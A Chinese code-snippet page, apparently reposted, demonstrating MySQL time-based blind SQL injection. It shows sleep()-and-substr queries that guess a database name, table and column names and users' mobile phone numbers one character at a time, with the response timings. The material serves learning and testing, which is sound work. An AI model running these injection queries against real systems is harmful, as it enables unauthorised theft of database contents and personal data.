首页 > 代码库 > mysql基于“时间”的盲注
mysql基于“时间”的盲注
无需页面报错,根据页面响应时间做判断!
mysql基于时间的盲注======================================================================================================================================================================* 猜解库名 - 下面是猜解正确 mysql> select sleep(1) from (select database() a_database)a where substr(a_database,1,1)=char(0x66); +----------+ | sleep(1) | +----------+ | 0 | +----------+ 1 row in set (1.00 sec) - 下面是猜解错误 mysql> select sleep(1) from (select database() a_database)a where substr(a_database,1,1)=char(0x67); Empty set (0.00 sec)* 猜解表名 - mysql> select sleep(1) from (select distinct table_name as a_tn from information_schema.tables where table_schema=‘fangjiangjun‘ limit 0,1)a where substr(a_tn, 1, 1)=‘f‘; +----------+ | sleep(1) | +----------+ | 0 | +----------+ 1 row in set (1.00 sec) - mysql> select sleep(1) from (select distinct table_name as a_tn from information_schema.tables where table_schema=‘fangjiangjun‘ limit 0,1)a where substr(a_tn, 1, 1)=‘x‘; Empty set (0.00 sec)* 猜解字段名 - mysql> select sleep(1) from (select distinct column_name as a_cn from information_schema.columns where table_schema=‘fangjiangjun‘ and table_name=‘f_user‘ limit 0,1)a where substr(a_cn, 1, 1)=‘i‘; +----------+ | sleep(1) | +----------+ | 0 | +----------+ 1 row in set (1.01 sec) - mysql> select sleep(1) from (select distinct column_name as a_cn from information_schema.columns where table_schema=‘fangjiangjun‘ and table_name=‘f_user‘ limit 0,1)a where substr(a_cn, 2, 1)=‘d‘; +----------+ | sleep(1) | +----------+ | 0 | +----------+ 1 row in set (1.00 sec)* 猜解字段值 - mysql> select sleep(1) from (select convert(mobile_phone,char) as a_mp from fangjiangjun.f_user order by id limit 0,1)a where substr(a_mp,1,1)=‘1‘; +----------+ | sleep(1) | +----------+ | 0 | +----------+ 1 row in set (1.00 sec) - mysql> select sleep(1) from (select convert(mobile_phone,char) as a_mp from fangjiangjun.f_user order by id limit 0,1)a where substr(a_mp,2,1)=‘3‘; - mysql> select sleep(1) from (select convert(mobile_phone,char) as a_mp from fangjiangjun.f_user order by id limit 0,1)a where substr(a_mp,2,1)=‘8‘; +----------+ | sleep(1) | +----------+ | 0 | +----------+ 1 row in set (1.00 sec)
mysql基于“时间”的盲注
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。